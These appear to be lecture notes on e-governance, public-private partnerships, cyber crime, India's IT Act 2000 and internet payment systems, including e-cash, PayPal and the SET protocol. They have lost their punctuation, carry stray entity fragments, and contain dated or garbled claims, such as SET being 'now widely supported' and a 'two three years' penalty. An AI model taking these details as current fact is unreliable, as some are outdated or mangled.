change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 1
1
INTERNET PAYMENT SYSTEM
Internet payment systems refer to the various methods by which individuals and companies doing
business online collect money from their customers in exchange for the goods and services they
provide A number of different forms of payment exist for online purchases and more are being
developed all the time After all it is in the best interest of both consumers and merchants to make
electronic commerce as safe and easy as possible The low cost of entry has attracted hundreds
of companies large and small to the level playing field of cyberspace Paul J Dowling Jr noted
in his book Web Advertising and Marketing On the Internet a small one-man operation can look
as good or better than a large multinational corporation But whether its an individual working
out of a virtual office or a CEO sitting in an expensive downtown office building theyre going
online for one purposemdashto sell And theyre leaving no stone unturned in their efforts to make it
safe and easy for their customers to buy
Customers who physically visit retail establishments can choose among a variety of payment
methods including cash checks credit cards and debit cards Customers who shop on the
Internet are beginning to expect online merchants to offer the same variety and convenience in
payment terms Credit cards remain the most common form of payment for online purchases
although the options have expanded to include digital cash smart cards electronic checks and
other technologies In addition some customers continue to make online purchases using
traditional payment methods such as placing orders by telephone or fax or sending a check
via snail mail Dowling recommends that companies conducting sales online make as many
payment methods available as possible and advertise their acceptance of those methods on their
Web sites He claims that small businesses can add value to their product or service offerings by
making payment easy comfortable and secure for their customers Getting paid on the Web
ultimately testifies to your marketing plans effectiveness Dowling wrote And when everything
goes as it should customers will place the order
Perhaps the biggest issue affecting online payment systemsmdashfrom both the sellers and the
buyers perspectivesmdashis maintaining the security of financial information sent over the Internet A
survey conducted by Visa showed that 91 percent of consumers were concerned about privacy
and security on the Internet Another study conducted by the Boston Consulting Group and
quoted in Computerworld indicated that 28 percent of consumers online purchase efforts failedmdash
meaning that they intended to buy online but did not complete the transaction Concerns about
security and the perception that online credit card transactions are extremely unsafe seem to be
among the biggest issues keeping many retailers and consumers from closing sales
electronically Lorna Pappas wrote in Chain Store Age Executive
Internet payment system is also known as Electronic Payment system
What Electronic Payment system is
Electronic Payment is a financial exchange that takes place online between buyers and sellers
The content of this exchange is usually some form of digital financial instrument (such as
encrypted credit card numbers electronic cheques or digital cash) that is backed by a bank or an
intermediary or by a legal tender
Electronic payment system is a system which helps the customer or user to make online payment
for their shopping
UNIT IV
PREPARED BY ARUN PRATAP SINGH 2
2
Requirements For E-payments
The various factors that have lead the financial institutions to make use of electronic payments
are
1 Decreasing technology cost The technology used in the networks is decreasing day by
day
2 Reduced operational and processing costDue to reduced technology cost the processing
cost of various commerce activities becomes very less A very simple reason to prove this
is the fact that in electronic transactions we save both paper and time
3 Increasing online commerce
Some Examples Of EPS-
Online Reservation
Online Bill Payment
Online Order Placing (Nirulas)
Online Ticket Booking ( Movie)
Major Internet Payment Methods
Secure Electronics Transaction (SET) Protocol for implementing credit card payment
An Electronic Check system for supporting check payment
An Electronic funds transfer and Electronic Cash system for emulating physical cash
payment
Other methods
bull Micropayment methods and Smart card methods
Two Storage Methods
On-line
Individual does not have possession personally of electronic cash
Trusted third party eg online bank holds customersrsquo cash accounts
Off-line
Customer holds cash on smart card or software wallet
Fraud and double spending require tamper-proof encryption
PREPARED BY ARUN PRATAP SINGH 3
3
E-Cash
A system that allows a person to pay for goods or services by transmitting a number
from one computer to another
Like the serial numbers on real currency notes the E-cash numbers are unique
This is issued by a bank and represents a specified sum of real money
It is anonymous and reusable
Electronic Cash Security
Complex cryptographic algorithms prevent double spending
Anonymity is preserved unless double spending is attempted
Serial numbers can allow tracing to prevent money laundering
E-Cash Processing
PREPARED BY ARUN PRATAP SINGH 4
4
E-Wallet
The E-wallet is another payment scheme that operates like a carrier of e-cash and other
information
The aim is to give shoppers a single simple and secure way of carrying currency
electronically
Trust is the basis of the e-wallet as a form of electronic payment
Procedure for using an e-wallet
1 Decide on an online site where you would like to shop
2 Download a wallet from the merchantrsquos website
3 Fill out personal information such as your credit card number name address and phone
number and where merchandise should be shipped
4 When you are ready to buy click on the wallet button the buying process is fully
executed
PREPARED BY ARUN PRATAP SINGH 5
5
Smart Cards
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
Smart card Processing
PREPARED BY ARUN PRATAP SINGH 6
6
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Credit cards
It is a Plastic Card having a Magnetic Number and code on it
It has Some fixed amount to spend
Customer has to repay the spend amount after sometime
PREPARED BY ARUN PRATAP SINGH 7
7
Processing a Credit cards payment ndash
Risk in using Credit cards -
Operational Risk
Credit Risk
Legal Risk
Secure Electronic Transaction (SET) Protocol
Jointly designed by MasterCard and Visa with backing of Microsoft Netscape IBM
GTE SAIC and others
Designed to provide security for card payments as they travel on the Internet
Contrasted with Secure Socket Layers (SSL) protocol SET validates consumers
and merchants in addition to providing secure transmission
SET specification
Uses public key cryptography and digital certificates for validating both
consumers and merchants
PREPARED BY ARUN PRATAP SINGH 8
8
Provides privacy data integrity user and merchant authentication and consumer
nonrepudiation
The SET Protocol
What Is Payment Gateways
A payment gateway is an e-commerce application service provider service that
authorizes payments for e-businesses online Shopping etc
PREPARED BY ARUN PRATAP SINGH 9
9
Payment gateway protects credit cards details encrypting sensitive information such
as credit card numbers to ensure that information passes securely between the
customer and the merchant and also between merchant and payment processor
How It works
Payments In India
Going the e-way
e-PAYMENT SYSTEM IN INDIA
bull Ever-increasing technology changes
bull Growing Internet access and mobile subscriber base
bull Rising consumer confidence
bull Convenient deliverypayment models
bull India has been one of the fastest growing country for payment cards in the Asia-Pacific
region
bull India currently has approximately 130 million cards (both debit and credit) in circulation
PREPARED BY ARUN PRATAP SINGH 10
10
GROWTH IN e-PAYMENT SYSTEM
REGULATION-
The Reserve Bank of India (RBI) has been supportive in the development of electronic
payments
In this direction the ldquoPayments and Settlement System Actrdquo was enacted
Apart from being supporting the RBI has also initiated various programs to encourage e-
payments
CHANNELS OF PAYMENT-
Indian banks have put in place various channels of electronic payments in place to
encourage customers to adopt the electronic mode
Channels like the Internet mobile ATMs and drop boxes are some of the most
frequently used channels apart from bank branches
MARKET MAPPING-
E-payments processing market has two major players namely
Tech Process and Bill Desk which is a pure play electronic transaction processing company
The Indian Payment System Is Transforming From Paper Mode To Electronic Mode
Two main reasons for such shift are-
PREPARED BY ARUN PRATAP SINGH 11
11
1 The regulator has mandated routing all high-value transactions electronically to minimize
movement of money and risk
2 At the retail end customers are realizing the efficiency of electronic payments
SHIFTS IN THE PAYMENT SYSTEM
TECHNOLOGICAL ADVANCEMENT IN e-PAYMENT
bull Electronic Clearing Service (Credit and Debit)
bull National Electronic Fund Transfer (NEFT)
THE RULING PLASTIC MONEY
Credit cards
Debit cards
ATM Cards
PayPal
PayPal is a global e-commerce business allowing payments and money transfers to be made
through the Internet Online money transfers serve as electronic alternatives to paying with
traditional paper methods such as checks and money orders It is subject to the US economic
sanction list and other rules and interventions required by US laws or government PayPal is an
acquirer performing payment processing for online vendors auction sites and other commercial
PREPARED BY ARUN PRATAP SINGH 12
12
users for which it charges a fee It may also charge a fee for receiving money proportional to the
amount received The fees depend on the currency used the payment option used the country
of the sender the country of the recipient the amount sent and the recipients account type In
addition eBay purchases made by credit card through PayPal may incur extra fees if the buyer
and seller use different currencies On October 3 2002 PayPal became a wholly owned
subsidiary of eBay Its corporate headquarters are in San Jose California United States at eBays
North First Street satellite office campus The company also has significant operations in Omaha
Scottsdale Charlotte and Austin in the United States Chennai in India Dublin in Ireland
Kleinmachnow in Germany and Tel Aviv in Israel From July 2007 PayPal has operated across
the European Union as a Luxembourg-based bank
Google Wallet
Google Wallet was launched in 2011 serving a similar function as PayPal to facilitate payments
and transfer money online It also features highly robust security and additional features such as
the ability to send payments as attachments via email
PREPARED BY ARUN PRATAP SINGH 13
13
CHARACTERISTICS OF PAYMENT SYSTEM
There is no paper involved so electronic payments can be effected directly from home or office
Fast efficient safe secure and generally less costly than paper-based alternatives eg cheques
Electronic payments are fully traceable
In Ireland the clearing time for standard electronic payments is next day value for interbank
transfers subject to the payment instruction being received ahead of lsquoshut-offrsquo times which can
vary from bank to bank Payment instructions received after the lsquoshut-offrsquo time will be processed
one working day later
Most banks offer same day value for payments made to other accounts held in that same bank
Many banks offer same day money transfer inter-bank services for large value payments
Unlike cheques electronic payments donrsquot lsquobouncersquo ndash as payments will not be effected unless the
funds are available in the first place
PREPARED BY ARUN PRATAP SINGH 14
14
Features of Payment Methods
bull Anonymity whether the payment method is anonymous
bull Security whether the payment method is secure
bull Overhead cost the overhead cost of processing a payment
bull Transferability whether a payment can be carried out without the involvement of a
third party
bull Divisibility whether a payment can be divided into arbitrary small payments whose
sum is equal to the original payment
bull Acceptability whether the payment method is supported globally
4C PAYMENTS METHODS
To make the e-commerce system functional we also need to incorporate payment
functions into the system
In the physical world there are 4 types of payment methods
bull Cash
bull Credit card
bull Check
bull Creditdebit (Fund Transfer)
bull Payment method should be
ndash Very secure
ndash Having Low overhead cost
ndash Transferable
ndash Acceptable anywhere
ndash Divisible
ndash Anonymous
Comparison of the 4C payment methods
PREPARED BY ARUN PRATAP SINGH 15
15
SET PROTOCOL FOR CREDIT CARD PAYMENT
bull The credit card is one of the most commonly used payment methods in e-commerce in particular B2C e-commerce
bull Before the introduction SET protocol secure credit card payment was usually carried out over an SSL connection
Advantage of SSL
bull It ensures the secure transmission of credit card information over the internet
Disadvantage of SSL
bull It is not a complete credit card payment method
bull For example it cannot support on-line credit card authorization
SET is specially developed to provide secure credit card payment over the internet
It is now widely supported by major credit card companies including Visa and
MasterCard
PREPARED BY ARUN PRATAP SINGH 16
16
bull SET aims at satisfying the following security requirements in the context of credit card
payment
ndash Confidentiality - Sensitive messages are encrypted so that they are kept
confidential
ndash Integrity - Nearly all messages are digitally signed to ensure content integrity
ndash Authentication - Authentication is performed through a public key infrastructure
SET network architecture
Merchant a seller which is connected to an acquirer
Cardholder a registered holder of the credit card who is a buyer
Issuer the bank that issues the credit card to a cardholder
Acquirer the bank that serves as an ldquoagentrdquo to link a merchant to multiple issuers
bull A merchant can process various credit cards through a single acquirer
bull Payment Gateway This is typically connected to the acquirer
ndash The payment gateway is situated between the SET system and the financial
network of the current credit card system for processing the credit card payment
SET Digital Certificate System
PREPARED BY ARUN PRATAP SINGH 17
17
Dual signature generation and verification ndash
bull In the physical credit card system
ndash the Payment Instructions (PI) including the cardholderrsquos credit card number and
signature are not kept confidential
ndash data integrity can basically be ensured by using printed receipts
ndash cardholderrsquos authentication relies on simple signature checking only
bull In an electronic credit card system
ndash the Order Information (OI) and PI can be digitally signed to ensure data integrity
ndash the sensitive credit card information may still be disclosed to other people
bull SET introduces a novel method called the dual signature (DS) to ensure data integrity
while protecting the sensitive information
PREPARED BY ARUN PRATAP SINGH 18
18
How the merchant and the payment gateway can verify the DS
bull The merchant is provided with OI H[PI] and DS
bull The dual signature can be verified as follows
Step 1 The merchant first finds
H[ H[PI] || H[OI] ]
Step 2 He then decrypts the digital signature with the cardholderrsquos public signature key as
follows
DRSA[ DS | keypublic_sign cardholder ]
Where
keypublic_sign cardholder public signature key of the cardholder
PREPARED BY ARUN PRATAP SINGH 19
19
Step 3 Finally he compares the two terms H[H[PI] || H[OI]] and
DRSA[DS | keypublic_signcardholder ]
They should be the same if the transmitted DS has not been changed otherwise the order is
not valid
The payment gateway is provided with PI H[OI] and DS
By using the dual signature method each cardholder can link OI and PI while releasing
only the necessary information to the relevant party
If either the OI or PI is changed the dual signature will no longer be valid
DIGITAL ENVELOPE ndash
PREPARED BY ARUN PRATAP SINGH 20
20
SET PROTOCOL ndash
SET protocol has four phases initiation purchase authorization and capture
First the cardholder sends a purchase initiation request to the merchant for initializing
the payment
Then the merchant returns a response message to the cardholder
In the second phase the cardholder sends the purchase order together with the
payment instruction to the merchant
In the third phase the merchant obtains the authorization from the issuer via the
payment gateway
